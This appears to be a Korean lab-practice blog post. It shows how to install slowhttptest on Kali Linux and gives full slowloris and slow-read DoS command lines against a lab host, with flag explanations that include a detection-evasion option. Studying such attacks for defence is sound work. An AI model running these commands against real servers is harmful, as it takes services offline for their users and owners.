kali linux에서
apt-get install slowhttptest
DDos slowloris
=====================
slowhttptest -H -c 2000 -i 1 -r 100 -x 3 -p 3 -u http://192.168.1.80
========================
DDos slow read dos
=================================
slowhttptest -X -c 1000 -r 200 -w 1 -y 1 -n 5 -z 1 -p 3 -u http://192.168.1.80
윈도우 사이즈도 1 버퍼사이즈도 1
window size 가 1로 바뀐다
=====================================
-H slow headers aka slowloris
-B R-U-Dead-Yet , RUDY 공격
-R Apache 취약점 공격
-X Slow Read 공격
-g 변화되는 소캣의 상태 통계 만든다. -o와 같이 사용
-o 보고서 출력
-c 타겟에 연결시도할 최대 세션숫자.
-i 데이터간의 전송 간격
-r 초당 연결 수. 높게 설정할수록 가파르게 연결 세션이 올라간다.
-u 공격할 url
-x 탐지를 피하기 위한 random한 문자열을 X- 다음에 붙여준다.
-p 몇초가 흐른 후에도 응답이 없으면 접속 불가능하다고 판단한다.
불안정한 get요청을 대기열에서 가지고있기떄문에
그 요청을 처리를 못하고있습니다.
그래서 메타스플로잇의 홈페이지를 접속을 하지못하게되는 원리입니다.
'공격기법 및 탐지' 카테고리의 다른 글
| synflooding 탐지 (0) | 2021.01.07 |
|---|---|
| kali linux에서 snort 탐지프로그램 설치 (0) | 2021.01.06 |
| DRDos 공격 실습 (0) | 2021.01.06 |
| syn-ack flooding 와 TCP, Get flooding 공격 실습 (0) | 2021.01.06 |
| ICMP flooding, smurf attack 공격실습 (0) | 2021.01.06 |